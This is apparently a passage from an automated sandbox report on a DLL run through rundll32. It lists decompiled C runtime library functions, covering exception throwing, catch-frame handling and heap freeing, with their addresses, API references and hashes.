                                                                                                                                • Opcode Fuzzy Hash: 1816dcfd00bc349030bf56c7733edbee8c3ccf0b53305d8e8004b0bedb9255de
                                                                                                                                • Instruction Fuzzy Hash: D301C0759002199BFB05DBB0CC52AFE7336EF443A1F214608E5106B1DADF38FA418B60
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10001C50, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 85%
                                                                                                                                			E10001C50(void* __ecx, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				char _v40;
				char _v44;
				void* _v84;
				char _v88;
				char _v108;
				char _v112;
				void* _v152;
				char _v156;
				signed int _t30;
				signed int _t34;
				signed char _t48;
				void* _t60;

				_push(0xffffffff);
				_push(E10015318);
				_push( *[fs:0x0]);
				_t30 =  *0x1001b694; // 0x9a1487b
				_push(_t30 ^ _t60 - 0x00000088);
				 *[fs:0x0] =  &_v12;
				_t34 = _a4 & 0x00000017;
				 *(__ecx + 8) = _t34;
				_t48 =  *(__ecx + 0xc) & _t34;
				if(_t48 != 0) {
					if(_a8 != 0) {
						E10006B9C(0, 0);
					}
					_t65 = _t48 & 0x00000004;
					if((_t48 & 0x00000004) != 0) {
						E10001AA0( &_v108, "ios_base::badbit set");
						_v8 = 0;
						E100019A0(_t58, _t65,  &_v112);
						_t48 =  &_v156;
						_v156 = 0x10016268;
						E10006B9C(_t48, 0x10019390);
					}
					_t66 = _t48 & 0x00000002;
					if((_t48 & 0x00000002) != 0) {
						E10001AA0( &_v108, "ios_base::failbit set");
						_t58 =  &_v112;
						_v8 = 1;
						E100019A0( &_v112, _t66,  &_v112);
						_v156 = 0x10016268;
						E10006B9C( &_v156, 0x10019390);
					}
					E10001AA0( &_v40, "ios_base::eofbit set");
					_v8 = 2;
					E100019A0(_t58, _t66,  &_v44);
					_v88 = 0x10016268;
					_t34 = E10006B9C( &_v88, 0x10019390);
				}
				 *[fs:0x0] = _v12;
				return _t34;
			}

















                                                                                                                                0x10001c50
                                                                                                                                0x10001c52
                                                                                                                                0x10001c5d
                                                                                                                                0x10001c64
                                                                                                                                0x10001c6b
                                                                                                                                0x10001c73
                                                                                                                                0x10001c80
                                                                                                                                0x10001c83
                                                                                                                                0x10001c89
                                                                                                                                0x10001c8b
                                                                                                                                0x10001c99
                                                                                                                                0x10001c9f
                                                                                                                                0x10001c9f
                                                                                                                                0x10001ca4
                                                                                                                                0x10001ca7
                                                                                                                                0x10001cb2
                                                                                                                                0x10001cc0
                                                                                                                                0x10001ccb
                                                                                                                                0x10001cd5
                                                                                                                                0x10001cda
                                                                                                                                0x10001ce2
                                                                                                                                0x10001ce2
                                                                                                                                0x10001ce7
                                                                                                                                0x10001cea
                                                                                                                                0x10001cf5
                                                                                                                                0x10001cfa
                                                                                                                                0x10001d03
                                                                                                                                0x10001d0e
                                                                                                                                0x10001d1d
                                                                                                                                0x10001d25
                                                                                                                                0x10001d25
                                                                                                                                0x10001d33
                                                                                                                                0x10001d41
                                                                                                                                0x10001d4c
                                                                                                                                0x10001d5b
                                                                                                                                0x10001d63
                                                                                                                                0x10001d63
                                                                                                                                0x10001d6f
                                                                                                                                0x10001d7d

                                                                                                                                APIs
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10001C9F
                                                                                                                                  • Part of subcall function 10006B9C: RaiseException.KERNEL32(?,?,10007141,?,?,?,?,?,10007141,?,100191C4,1001C640,?,100010D3,00000000,00000003), ref: 10006BDE
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10001CE2
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10001D25
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10001D63
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                • API String ID: 3476068407-1866435925
                                                                                                                                • Opcode ID: 787cc1faebcb331becc40892e4bbf07b5e958bb6efb997f4fad806d0a16b273a
                                                                                                                                • Instruction ID: 5d2ce6f1aabe269a185c86e44919a4fa2b20f430a779cec60424981602c4ec72
                                                                                                                                • Opcode Fuzzy Hash: 787cc1faebcb331becc40892e4bbf07b5e958bb6efb997f4fad806d0a16b273a
                                                                                                                                • Instruction Fuzzy Hash: 06215EB5418740AEE355CB60CC42FDAB7E4EF89384F80890DF69A87185DB79A149CB23
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10007F60, Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 90%
                                                                                                                                			E10007F60(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x10019a00);
				E1000B078(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E10007423(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E1000C3E3(__ecx, __edx, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E1000C3E3(_t48, __edx, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E1000C3E3(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E1000C3E3(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E100074C8(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E10008086(_t48, _t53, _t55, _t57, _t61);
				return E1000B0BD( *((intOrPtr*)(_t58 - 0x1c)));
			}







                                                                                                                                0x10007f60
                                                                                                                                0x10007f60
                                                                                                                                0x10007f60
                                                                                                                                0x10007f62
                                                                                                                                0x10007f67
                                                                                                                                0x10007f6c
                                                                                                                                0x10007f6e
                                                                                                                                0x10007f71
                                                                                                                                0x10007f74
                                                                                                                                0x10007f77
                                                                                                                                0x10007f7e
                                                                                                                                0x10007f8f
                                                                                                                                0x10007f9d
                                                                                                                                0x10007fab
                                                                                                                                0x10007fb3
                                                                                                                                0x10007fc1
                                                                                                                                0x10007fc7
                                                                                                                                0x10007fce
                                                                                                                                0x10007fd1
                                                                                                                                0x10007fe7
                                                                                                                                0x10007fea
                                                                                                                                0x1000805f
                                                                                                                                0x10008066
                                                                                                                                0x1000806d
                                                                                                                                0x1000807a

                                                                                                                                APIs
                                                                                                                                • __CreateFrameInfo.LIBCMT ref: 10007F88
                                                                                                                                  • Part of subcall function 10007423: __getptd.LIBCMT ref: 10007431
                                                                                                                                  • Part of subcall function 10007423: __getptd.LIBCMT ref: 1000743F
                                                                                                                                • __getptd.LIBCMT ref: 10007F92
                                                                                                                                  • Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
                                                                                                                                  • Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3
                                                                                                                                • __getptd.LIBCMT ref: 10007FA0
                                                                                                                                • __getptd.LIBCMT ref: 10007FAE
                                                                                                                                • __getptd.LIBCMT ref: 10007FB9
                                                                                                                                • _CallCatchBlock2.LIBCMT ref: 10007FDF
                                                                                                                                  • Part of subcall function 100074C8: __CallSettingFrame@12.LIBCMT ref: 10007514
                                                                                                                                  • Part of subcall function 10008086: __getptd.LIBCMT ref: 10008095
                                                                                                                                  • Part of subcall function 10008086: __getptd.LIBCMT ref: 100080A3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1602911419-0
                                                                                                                                • Opcode ID: d8abb42c3c29ad143a40f4adfd576839e02e6d599755f7ca258e769317ed5c19
                                                                                                                                • Instruction ID: 3582c551e006ef8332b87da498695a48188647825b81d49dd4b3c68d68ee0da3
                                                                                                                                • Opcode Fuzzy Hash: d8abb42c3c29ad143a40f4adfd576839e02e6d599755f7ca258e769317ed5c19
                                                                                                                                • Instruction Fuzzy Hash: 5711C6B5C04309DFEB40DFA4C845BAEBBB1FF04350F108069F854A7256DB79AA559F90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 1000FB43, Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 89%
                                                                                                                                			E1000FB43(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x10019e70);
				E1000B078(__ebx, __edi, __esi);
				_t31 = E1000C3E3(__ebx, __edx, __edi, _t35);
				_t15 =  *0x1001bfd0; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1000BA3C(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x1001bed8; // 0x4c41688
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x1001bab0;
								if(__eflags != 0) {
									_push(_t33);
									E100088C4(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x1001bed8; // 0x4c41688
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x1001bed8; // 0x4c41688
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E1000FBDE();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E1000B5DD(_t29, _t31, 0x20);
				}
				return E1000B0BD(_t33);
			}










                                                                                                                                0x1000fb43
                                                                                                                                0x1000fb43
                                                                                                                                0x1000fb43
                                                                                                                                0x1000fb43
                                                                                                                                0x1000fb45
                                                                                                                                0x1000fb4a
                                                                                                                                0x1000fb54
                                                                                                                                0x1000fb56
                                                                                                                                0x1000fb5e
                                                                                                                                0x1000fb7f
                                                                                                                                0x1000fb85
                                                                                                                                0x1000fb89
                                                                                                                                0x1000fb8c
                                                                                                                                0x1000fb8f
                                                                                                                                0x1000fb95
                                                                                                                                0x1000fb97
                                                                                                                                0x1000fb99
                                                                                                                                0x1000fb9c
                                                                                                                                0x1000fba2
                                                                                                                                0x1000fba4
                                                                                                                                0x1000fba6
                                                                                                                                0x1000fbac
                                                                                                                                0x1000fbae
                                                                                                                                0x1000fbaf
                                                                                                                                0x1000fbb4
                                                                                                                                0x1000fbac
                                                                                                                                0x1000fba4
                                                                                                                                0x1000fbb5
                                                                                                                                0x1000fbba
                                                                                                                                0x1000fbbd
                                                                                                                                0x1000fbc3
                                                                                                                                0x1000fbc7
                                                                                                                                0x1000fbc7
                                                                                                                                0x1000fbcd
                                                                                                                                0x1000fbd4
                                                                                                                                0x1000fb66
                                                                                                                                0x1000fb66
                                                                                                                                0x1000fb66
                                                                                                                                0x1000fb6b
                                                                                                                                0x1000fb6f
                                                                                                                                0x1000fb74
                                                                                                                                0x1000fb7c

                                                                                                                                APIs
                                                                                                                                • __getptd.LIBCMT ref: 1000FB4F
                                                                                                                                  • Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
                                                                                                                                  • Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3
                                                                                                                                • __amsg_exit.LIBCMT ref: 1000FB6F
                                                                                                                                • __lock.LIBCMT ref: 1000FB7F
                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1000FB9C
                                                                                                                                • InterlockedIncrement.KERNEL32(04C41688), ref: 1000FBC7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4271482742-0
                                                                                                                                • Opcode ID: 78a8d0a44b960d73edaae4df3d62959c672fc55dbbfea46cf7274b8bbea52d6c
                                                                                                                                • Instruction ID: 805db3216799d21ba311b977020a7a4edf2183a3f6cde0538c14fa6ac8423c3f
                                                                                                                                • Opcode Fuzzy Hash: 78a8d0a44b960d73edaae4df3d62959c672fc55dbbfea46cf7274b8bbea52d6c
                                                                                                                                • Instruction Fuzzy Hash: E401A136900B269BF711DB64CC55B5E73E0EF087D0F058059E81067A98CB74A980DFD2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 100088C4, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 41%
                                                                                                                                			E100088C4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x10019aa0);
				_t8 = E1000B078(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E1000B0BD(_t8);
				}
				if( *0x1001d0e8 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x1001ce68, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1000B02E(_t31);
						 *_t10 = E1000AFEC(GetLastError());
					}
					goto L9;
				}
				E1000BA3C(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1000CD72(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1000CDA2();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1000891A();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                                                0x100088c4
                                                                                                                                0x100088c6
                                                                                                                                0x100088cb
                                                                                                                                0x100088d0
                                                                                                                                0x100088d5
                                                                                                                                0x1000894c
                                                                                                                                0x10008951
                                                                                                                                0x10008951
                                                                                                                                0x100088de
                                                                                                                                0x10008923
                                                                                                                                0x10008924
                                                                                                                                0x1000892c
                                                                                                                                0x10008932
                                                                                                                                0x10008934
                                                                                                                                0x10008936
                                                                                                                                0x10008949
                                                                                                                                0x1000894b
                                                                                                                                0x00000000
                                                                                                                                0x10008934
                                                                                                                                0x100088e2
                                                                                                                                0x100088e8
                                                                                                                                0x100088ed
                                                                                                                                0x100088f3
                                                                                                                                0x100088f8
                                                                                                                                0x100088fa
                                                                                                                                0x100088fb
                                                                                                                                0x100088fc
                                                                                                                                0x10008902
                                                                                                                                0x10008903
                                                                                                                                0x1000890a
                                                                                                                                0x10008913
                                                                                                                                0x00000000
                                                                                                                                0x10008915
                                                                                                                                0x10008915
                                                                                                                                0x00000000
                                                                                                                                0x10008915

                                                                                                                                APIs
                                                                                                                                • __lock.LIBCMT ref: 100088E2
                                                                                                                                  • Part of subcall function 1000BA3C: __mtinitlocknum.LIBCMT ref: 1000BA52
                                                                                                                                  • Part of subcall function 1000BA3C: __amsg_exit.LIBCMT ref: 1000BA5E
                                                                                                                                  • Part of subcall function 1000BA3C: EnterCriticalSection.KERNEL32(1000C386,1000C386,?,10010532,00000004,10019EB0,0000000C,10009EA2,00000001,1000C395,00000000,00000000,00000000,?,1000C395,00000001), ref: 1000BA66
                                                                                                                                • ___sbh_find_block.LIBCMT ref: 100088ED
                                                                                                                                • ___sbh_free_block.LIBCMT ref: 100088FC
                                                                                                                                • HeapFree.KERNEL32(00000000,00000001,10019AA0,0000000C,1000BA1D,00000000,10019CA0,0000000C,1000BA57,00000001,1000C386,?,10010532,00000004,10019EB0,0000000C), ref: 1000892C
                                                                                                                                • GetLastError.KERNEL32(?,10010532,00000004,10019EB0,0000000C,10009EA2,00000001,1000C395,00000000,00000000,00000000,?,1000C395,00000001,00000214), ref: 1000893D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2714421763-0
                                                                                                                                • Opcode ID: 1c8eb4afa8c8931ff63bd2bdb732b9c8326ff6739dc6c832ed7ed04e6504a4e9
                                                                                                                                • Instruction ID: 401740cd35cc9e6689fc1378af17d25d43dfe7f4e25987c4797ecc74e1b0f346
                                                                                                                                • Opcode Fuzzy Hash: 1c8eb4afa8c8931ff63bd2bdb732b9c8326ff6739dc6c832ed7ed04e6504a4e9
                                                                                                                                • Instruction Fuzzy Hash: 9201A235805326AAFB20EF709C0AB6E3AE4EF053E4F244119F444A6099CB34EB81CB56
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 1000830D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 28%
                                                                                                                                			E1000830D(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E1000827B(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E1000717B(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E10007CE5(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E10007F60(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E10007142(_t20, _t27);
					return _t20;
				}
				return _t20;
			}











                                                                                                                                0x1000830d
                                                                                                                                0x1000830d
                                                                                                                                0x1000830d
                                                                                                                                0x1000830d
                                                                                                                                0x1000830d
                                                                                                                                0x10008312
                                                                                                                                0x10008316
                                                                                                                                0x10008318
                                                                                                                                0x1000831b
                                                                                                                                0x1000831c
                                                                                                                                0x1000831d
                                                                                                                                0x10008320
                                                                                                                                0x10008325
                                                                                                                                0x10008325
                                                                                                                                0x10008328
                                                                                                                                0x1000832c
                                                                                                                                0x1000832f
                                                                                                                                0x10008334
                                                                                                                                0x10008331
                                                                                                                                0x10008331
                                                                                                                                0x10008331
                                                                                                                                0x10008337
                                                                                                                                0x1000833c
                                                                                                                                0x1000833e
                                                                                                                                0x10008341
                                                                                                                                0x10008344
                                                                                                                                0x10008345
                                                                                                                                0x1000834d
                                                                                                                                0x10008352
                                                                                                                                0x10008356
                                                                                                                                0x10008359
                                                                                                                                0x1000835c
                                                                                                                                0x10008362
                                                                                                                                0x10008363
                                                                                                                                0x10008366
                                                                                                                                0x10008370
                                                                                                                                0x10008374
                                                                                                                                0x00000000
                                                                                                                                0x10008374
                                                                                                                                0x1000837a

                                                                                                                                APIs
                                                                                                                                • ___BuildCatchObject.LIBCMT ref: 10008320
                                                                                                                                  • Part of subcall function 1000827B: ___BuildCatchObjectHelper.LIBCMT ref: 100082B1
                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 10008337
                                                                                                                                • ___FrameUnwindToState.LIBCMT ref: 10008345
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                • String ID: csm
                                                                                                                                • API String ID: 2163707966-1018135373
                                                                                                                                • Opcode ID: d83d8fdc591bf5ebad8e36828610a1efa5597a14133a2e7603aaa7ae4084a27f
                                                                                                                                • Instruction ID: a58079fbc8efe559b7519203738159b5da1fe66325aa0d8746bc6bba66cd6c4f
                                                                                                                                • Opcode Fuzzy Hash: d83d8fdc591bf5ebad8e36828610a1efa5597a14133a2e7603aaa7ae4084a27f
                                                                                                                                • Instruction Fuzzy Hash: 8601E47540110ABBEF129F51CC41EEA7FAAFF583D4F104014BD5815169DB36EAB1DBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10007C9C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 74%
                                                                                                                                			E10007C9C(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;

				_t25 = __edi;
				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E1000C3E3(_t23, __edx, __edi, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E1000C3E3(_t23, __edx, __edi, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E1000C3E3(_t23, __edx, __edi, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x10019d50);
						E1000B078(_t23, __edi, __esi);
						_t19 =  *((intOrPtr*)(E1000C3E3(_t23, __edx, _t25, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E1000B0BD(E10009F26(_t23, _t24, _t25));
					}
				}
			}








                                                                                                                                0x10007c9c
                                                                                                                                0x10007c9c
                                                                                                                                0x10007ca6
                                                                                                                                0x10007cad
                                                                                                                                0x10007ccc
                                                                                                                                0x10007cd3
                                                                                                                                0x10007cda
                                                                                                                                0x10007cdf
                                                                                                                                0x10007cdf
                                                                                                                                0x10007cdf
                                                                                                                                0x00000000
                                                                                                                                0x10007caf
                                                                                                                                0x10007caf
                                                                                                                                0x10007cb4
                                                                                                                                0x10007ce1
                                                                                                                                0x10007ce1
                                                                                                                                0x10007ce4
                                                                                                                                0x10007cb6
                                                                                                                                0x10007cbb
                                                                                                                                0x1000cb87
                                                                                                                                0x1000cb89
                                                                                                                                0x1000cb8e
                                                                                                                                0x1000cb98
                                                                                                                                0x1000cb9d
                                                                                                                                0x1000cb9f
                                                                                                                                0x1000cba3
                                                                                                                                0x1000cbae
                                                                                                                                0x1000cbae
                                                                                                                                0x1000cbbf
                                                                                                                                0x1000cbbf
                                                                                                                                0x10007cb4

                                                                                                                                APIs
                                                                                                                                • __getptd.LIBCMT ref: 10007CB6
                                                                                                                                  • Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
                                                                                                                                  • Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3
                                                                                                                                • __getptd.LIBCMT ref: 10007CC7
                                                                                                                                • __getptd.LIBCMT ref: 10007CD5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                • String ID: MOC
                                                                                                                                • API String ID: 803148776-624257665
                                                                                                                                • Opcode ID: 533799551ab5621f90d1c8c2dd912f006ed24f99fabe8d318c7649798b605778
                                                                                                                                • Instruction ID: 748e218daad55e3622726c51059574500725c268f5a768dba96258ea37b88039
                                                                                                                                • Opcode Fuzzy Hash: 533799551ab5621f90d1c8c2dd912f006ed24f99fabe8d318c7649798b605778
                                                                                                                                • Instruction Fuzzy Hash: 1AE0BF3991030C8FF750DB65C086F5837E4FB49394F1941A6E44CC72A7DB38F9509A92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

